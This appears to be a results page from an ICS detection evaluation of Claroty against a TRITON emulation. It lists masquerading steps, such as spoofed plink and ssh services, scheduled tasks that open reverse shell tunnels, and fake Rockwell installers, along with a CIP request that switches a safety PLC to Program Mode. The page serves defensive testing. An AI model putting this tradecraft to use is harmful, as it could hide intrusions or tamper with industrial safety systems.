Home >
ICS >
Participants >
Claroty >
Evasion (TA0103)
|
|
TRITON |
||||
Step | ATT&CK Pattern |
|
||
3.A.1
![]() |
Technique Masquerading (T0849) |
|
||
4.A.1
![]() |
Technique Masquerading (T0849) |
|
||
4.B.1
![]() |
Technique Masquerading (T0849) |
|
||
5.A.1
![]() |
Technique Masquerading (T0849) |
|
||
6.B.1
![]() |
Technique Masquerading (T0849) |
|
||
6.C.1
![]() |
Technique Masquerading (T0849) |
|
||
6.D.1
|
Technique Masquerading (T0849) |
|
||
6.E.1
![]() |
Technique Masquerading (T0849) |
|
||
8.A.1
![]() |
Technique Masquerading (T0849) |
|
||
11.A.1
![]() |
Technique Masquerading (T0849) |
|
||
11.C.1
![]() |
Technique Masquerading (T0849) |
|
||
14.B.1
![]() |
Technique Masquerading (T0849) |
|
||
17.B.1
![]() |
Technique Masquerading (T0849) |
|
||
19.B.1
![]() |
Technique Masquerading (T0849) |
|
||
22.A.2
|
Technique Change Operating Mode (T0858) |
|
Criteria
Evidence that the newly created files copied from the RDP shared folder into the control EWS Temp SMB directory are not legitimate ("SMBClient.exe", "SMB_Sync.xml", and "SMB_Update.xml").
Criteria
Evidence that the scheduled task "SMB_sync.xml" is not legitimate and was imported into Task Scheduler (the task executes a spoofed plink executable to initiate a reverse shell tunnel).
Criteria
Evidence that the "SMBClient.exe" process is not legitimate (binary is spoofed plink.exe used to create a SSH tunnel and redirect ports).
Criteria
Evidence that the newly created files from the extraction of "csp3.zip" in the Temp Rockwell directory are not legitimate ("csp.exe", "Install-csp.ps1", "csp-agent.exe", "sftp.exe", etc.).
Criteria
Evidence that the "rockwell-csp3" service is not legitimate (service is spoofed SSDH, created then executed via Start-Service).
Criteria
Evidence that the "csp-agent" service is not legitimate (service is spoofed ssh-agent, created then executed via Start-Service).
Criteria
Evidence that the scheduled task "SMB_update.xml" is not legitimate and was imported into Task Scheduler (the task executes a spoofed plink executable to initiate a reverse shell tunnel).
Criteria
Evidence that the "SMBClient.exe" process is not legitimate (binary is spoofed plink.exe used to create a SSH tunnel and redirect ports).
Criteria
Evidence that the newly created files from the extraction of "RSLINX_install.zip" in the Temp Rockwell RSLINX directory are not legitimate ("RSLINX.exe" and "LogixMap.exe").
Criteria
Evidence that the newly created files from the extraction of "RSLINX_install.zip" in the Temp Rockwell RSLINX directory are not legitimate ("RSLINX.exe" and "LogixMap.exe").
Criteria
Evidence that the services "rockwell-csp3" and "csp-agent" are not legitimate (service is spoofed SSDH and ssh-agent underlying, created then executed via Start-Service).
Criteria
Evidence that the newly created files from the extraction of "RSLINX_install.zip" in the Temp Rockwell RSLINX directory are not legitimate ("RSLINX.exe" and "LogixMap.exe").
Criteria
Evidence that the newly created files from the extraction of "Install_RSLogix.zip" in the Temp Rockwell RSLogix directory are not legitimate ("RSLogix5000.exe", "RSComms.exe", etc.)
Criteria
Evidence that the newly created files from the extraction of "Install_GuardLogix.zip" in the Temp Rockwell GuardLogix directory are not legitimate ("RSLogix5000.exe", "RSComms.exe", "abRSA.exe", etc.)
Criteria
Evidence of the safety PLC operating mode being switched to Program Mode following adversary CIP request to instance 0x01 of class 0x8E using service 0x07.